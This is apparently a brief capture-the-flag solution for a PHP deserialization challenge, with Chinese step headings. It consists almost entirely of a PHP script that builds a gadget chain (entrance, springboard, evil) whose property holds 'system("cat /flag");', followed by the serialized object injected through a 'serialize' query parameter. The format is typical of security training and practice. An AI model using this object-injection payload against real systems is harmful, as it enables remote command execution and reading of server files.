1.构造脚本

<?php

class entrance
{
public $start;

}

class springboard
{
public $middle;
}

class evil
{
public $end = 'system("cat /flag");';
}

$evil = new evil;
$springboard = new springboard;
$springboard->middle = $evil;
$entrance = new entrance;
$entrance->start = $springboard;
echo serialize($entrance);
?>

2.pyload

?serialize=O:8:"entrance":1:{s:5:"start";O:11:"springboard":1:{s:6:"middle";O:4:"evil":1:{s:3:"end";s:20:"system("cat /flag");";}}